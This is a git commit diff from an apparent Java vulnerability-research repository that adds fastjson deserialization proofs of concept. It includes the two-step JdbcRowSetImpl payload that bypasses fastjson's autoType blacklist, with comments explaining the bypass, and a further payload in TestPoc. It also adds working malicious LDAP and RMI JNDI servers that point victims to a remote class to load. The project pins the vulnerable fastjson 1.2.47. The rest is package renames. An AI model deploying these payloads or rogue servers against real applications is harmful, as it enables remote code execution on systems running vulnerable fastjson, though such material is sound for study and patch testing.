op code

xuanyh · xuanyh · commit 54a54886a650 · 2019-07-12T10:16:21.000+08:00
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,3 @@
+.idea
+*.iml
+target
diff --git a/pom.xml b/pom.xml
@@ -44,7 +44,7 @@
     <dependency>
       <groupId>com.alibaba</groupId>
       <artifactId>fastJson</artifactId>
-      <version>1.2.24</version>
+      <version>1.2.47</version>
     </dependency>
 
     <!-- jsonkson -->
@@ -54,6 +54,33 @@
       <version>2.6.3</version>
     </dependency>
 
+    <!-- ldap -->
+    <dependency>
+      <groupId>com.unboundid</groupId>
+      <artifactId>unboundid-ldapsdk</artifactId>
+      <version>3.1.1</version>
+    </dependency>
+
+    <!-- logback -->
+    <dependency>
+      <groupId>ch.qos.logback</groupId>
+      <artifactId>logback-core</artifactId>
+      <version>1.2.1</version>
+    </dependency>
+
+    <!-- 数据库连接池 -->
+    <dependency>
+      <groupId>com.alibaba</groupId>
+      <artifactId>druid</artifactId>
+      <version>1.1.6</version>
+    </dependency>
+    <!-- mysql -->
+    <dependency>
+      <groupId>mysql</groupId>
+      <artifactId>mysql-connector-java</artifactId>
+      <version>5.1.34</version>
+    </dependency>
+
   </dependencies>
 
   <build>
diff --git a/src/main/java/com/threedr3am/bug/collections3/no1/SerializeMapForTransformer.java b/src/main/java/com/threedr3am/bug/collections3/no1/SerializeMapForTransformer.java
@@ -1,7 +1,7 @@
-package com.xyh.collections3.no1;
+package com.threedr3am.bug.collections3.no1;
 
 
-import com.xyh.utils.SerializeUtil;
+import com.threedr3am.bug.utils.SerializeUtil;
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
diff --git a/src/main/java/com/threedr3am/bug/collections3/no2/CallbackRuntime.java b/src/main/java/com/threedr3am/bug/collections3/no2/CallbackRuntime.java
@@ -1,4 +1,4 @@
-package com.xyh.collections3.no2;
+package com.threedr3am.bug.collections3.no2;
 
 import java.io.BufferedInputStream;
 
diff --git a/src/main/java/com/threedr3am/bug/collections3/no2/CallbackRuntime2.java b/src/main/java/com/threedr3am/bug/collections3/no2/CallbackRuntime2.java
@@ -1,4 +1,4 @@
-package com.xyh.collections3.no2;
+package com.threedr3am.bug.collections3.no2;
 
 import java.io.BufferedInputStream;
 
diff --git a/src/main/java/com/threedr3am/bug/collections3/no2/SerializeMapForTransformer.java b/src/main/java/com/threedr3am/bug/collections3/no2/SerializeMapForTransformer.java
@@ -1,7 +1,7 @@
-package com.xyh.collections3.no2;
+package com.threedr3am.bug.collections3.no2;
 
-import com.xyh.utils.FileToByteArrayUtil;
-import com.xyh.utils.SerializeUtil;
+import com.threedr3am.bug.utils.FileToByteArrayUtil;
+import com.threedr3am.bug.utils.SerializeUtil;
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
diff --git a/src/main/java/com/threedr3am/bug/fastjson/Cmd.java b/src/main/java/com/threedr3am/bug/fastjson/Cmd.java
@@ -1,4 +1,4 @@
-package com.xyh.fastjson;
+package com.threedr3am.bug.fastjson;
 
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
diff --git a/src/main/java/com/threedr3am/bug/fastjson/FastjsonSerialize.java b/src/main/java/com/threedr3am/bug/fastjson/FastjsonSerialize.java
@@ -1,8 +1,8 @@
-package com.xyh.fastjson;
+package com.threedr3am.bug.fastjson;
 
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.parser.Feature;
-import com.xyh.utils.FileToByteArrayUtil;
+import com.threedr3am.bug.utils.FileToByteArrayUtil;
 import sun.misc.BASE64Encoder;
 
 /**
diff --git a/src/main/java/com/threedr3am/bug/fastjson/NoNeedAutoTypePoc.java b/src/main/java/com/threedr3am/bug/fastjson/NoNeedAutoTypePoc.java
@@ -0,0 +1,35 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.threedr3am.bug.server.LdapServer;
+
+/**
+ * fastjson 1.2.48以下不需要任何配置，默认配置通杀RCE
+ * @author xuanyh
+ */
+public class NoNeedAutoTypePoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    //TODO 使用rmi server模式时，jdk版本高的需要开启URLCodebase trust
+//    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
+
+    /*
+    * TODO 该payload需要先通过java.lang.Class把com.sun.rowset.JdbcRowSetImpl加载进fastjson缓存，然后利用
+    * TODO checkAutoType方法的缺陷（先通过缓存查询，有则立马返回，JdbcRowSetImpl否则检查黑名单hash）绕过黑名单和autoType的检查
+    */
+    String payload = "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}";
+//    String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43657/Calc\",\"autoCommit\":true}";//rmi方式
+    String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}";//ldap方式
+    JSON.parse(payload);
+    JSON.parse(payload2);
+    //所以，该payload需要分两步进行
+  }
+}
diff --git a/src/main/java/com/threedr3am/bug/fastjson/TestPoc.java b/src/main/java/com/threedr3am/bug/fastjson/TestPoc.java
@@ -0,0 +1,29 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.server.LdapServer;
+
+/**
+ * 挖洞
+ *
+ * @author xuanyh
+ */
+public class TestPoc {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    //TODO 使用rmi server模式时，jdk版本高的需要开启URLCodebase trust
+//    System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String payload = "{\"@type\":\"\",\"url\":\"ldap://localhost:43658/Calc\",\"started\":true}";//ldap方式
+    JSON.parse(payload);
+  }
+}
diff --git a/src/main/java/com/threedr3am/bug/server/LdapServer.java b/src/main/java/com/threedr3am/bug/server/LdapServer.java
@@ -0,0 +1,105 @@
+package com.threedr3am.bug.server;
+
+import com.unboundid.ldap.listener.InMemoryDirectoryServer;
+import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
+import com.unboundid.ldap.listener.InMemoryListenerConfig;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPException;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+import java.net.InetAddress;
+import java.net.MalformedURLException;
+import java.net.URL;
+import javax.net.ServerSocketFactory;
+import javax.net.SocketFactory;
+import javax.net.ssl.SSLSocketFactory;
+
+/**
+ * LDAP server
+ *
+ * @author xuanyh
+ */
+public class LdapServer {
+
+  private static final String LDAP_BASE = "dc=example,dc=com";
+
+  public static void main(String[] args) {
+    run();
+  }
+
+  public static void run() {
+    int port = 43658;
+    //TODO 把resources下的Calc.class 或者 自定义修改编译后target目录下的Calc.class 拷贝到下面代码所示http://host:port的web服务器根目录即可
+    String url = "http://localhost:80#Calc";
+    try {
+      InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
+      config.setListenerConfigs(new InMemoryListenerConfig(
+          "listen", //$NON-NLS-1$
+          InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
+          port,
+          ServerSocketFactory.getDefault(),
+          SocketFactory.getDefault(),
+          (SSLSocketFactory) SSLSocketFactory.getDefault()));
+
+      config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url)));
+      InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
+      System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
+      ds.startListening();
+
+    } catch (Exception e) {
+      e.printStackTrace();
+    }
+  }
+
+  private static class OperationInterceptor extends InMemoryOperationInterceptor {
+
+    private URL codebase;
+
+
+    /**
+     *
+     */
+    public OperationInterceptor(URL cb) {
+      this.codebase = cb;
+    }
+
+
+    /**
+     * {@inheritDoc}
+     *
+     * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
+     */
+    @Override
+    public void processSearchResult(InMemoryInterceptedSearchResult result) {
+      String base = result.getRequest().getBaseDN();
+      Entry e = new Entry(base);
+      try {
+        sendResult(result, base, e);
+      } catch (Exception e1) {
+        e1.printStackTrace();
+      }
+
+    }
+
+
+    protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e)
+        throws LDAPException, MalformedURLException {
+      URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
+      System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
+      e.addAttribute("javaClassName", "Exploit");
+      String cbstring = this.codebase.toString();
+      int refPos = cbstring.indexOf('#');
+      if (refPos > 0) {
+        cbstring = cbstring.substring(0, refPos);
+      }
+      e.addAttribute("javaCodeBase", cbstring);
+      e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
+      e.addAttribute("javaFactory", this.codebase.getRef());
+      result.sendSearchEntry(e);
+      result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+
+  }
+}
diff --git a/src/main/java/com/threedr3am/bug/server/RmiServer.java b/src/main/java/com/threedr3am/bug/server/RmiServer.java
@@ -0,0 +1,37 @@
+package com.threedr3am.bug.server;
+
+import com.sun.jndi.rmi.registry.ReferenceWrapper;
+import java.rmi.AlreadyBoundException;
+import java.rmi.RemoteException;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import javax.naming.NamingException;
+import javax.naming.Reference;
+
+/**
+ * rmi server
+ *
+ * @author xuanyh
+ */
+public class RmiServer {
+
+  public static void main(String[] args) {
+    run();
+  }
+
+  public static void run() {
+    try {
+      Registry registry = LocateRegistry.createRegistry(43657);
+      //TODO 把resources下的Calc.class 或者 自定义修改编译后target目录下的Calc.class 拷贝到下面代码所示http://host:port的web服务器根目录即可
+      Reference reference = new Reference("Calc","Calc","http://localhost/");
+      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
+      registry.bind("Calc",referenceWrapper);
+    } catch (RemoteException e) {
+      e.printStackTrace();
+    } catch (AlreadyBoundException e) {
+      e.printStackTrace();
+    } catch (NamingException e) {
+      e.printStackTrace();
+    }
+  }
+}
diff --git a/src/main/java/com/threedr3am/bug/utils/FileToByteArrayUtil.java b/src/main/java/com/threedr3am/bug/utils/FileToByteArrayUtil.java
@@ -1,4 +1,4 @@
-package com.xyh.utils;
+package com.threedr3am.bug.utils;
 
 import java.io.File;
 import java.io.FileInputStream;
diff --git a/src/main/java/com/threedr3am/bug/utils/SerializeUtil.java b/src/main/java/com/threedr3am/bug/utils/SerializeUtil.java
@@ -1,4 +1,4 @@
-package com.xyh.utils;
+package com.threedr3am.bug.utils;
 
 import java.io.ByteArrayInputStream;
 import java.io.ByteArrayOutputStream;
diff --git a/src/main/java/com/xyh/fastjson/NoNeedAutoTypePoc.java b/src/main/java/com/xyh/fastjson/NoNeedAutoTypePoc.java
diff --git a/src/test/java/com/threedr3am/bug/AppTest.java b/src/test/java/com/threedr3am/bug/AppTest.java
@@ -1,4 +1,4 @@
-package com.xyh;
+package com.threedr3am.bug;
 
 import static org.junit.Assert.assertTrue;
 

Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-package com.xyh.collections3.no2;`
	`1`	`+package com.threedr3am.bug.collections3.no2;`
`2`	`2`
`3`	`3`	`import java.io.BufferedInputStream;`
`4`	`4`
Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-package com.xyh.fastjson;`
	`1`	`+package com.threedr3am.bug.fastjson;`
`2`	`2`
`3`	`3`	`import com.sun.org.apache.xalan.internal.xsltc.DOM;`
`4`	`4`	`import com.sun.org.apache.xalan.internal.xsltc.TransletException;`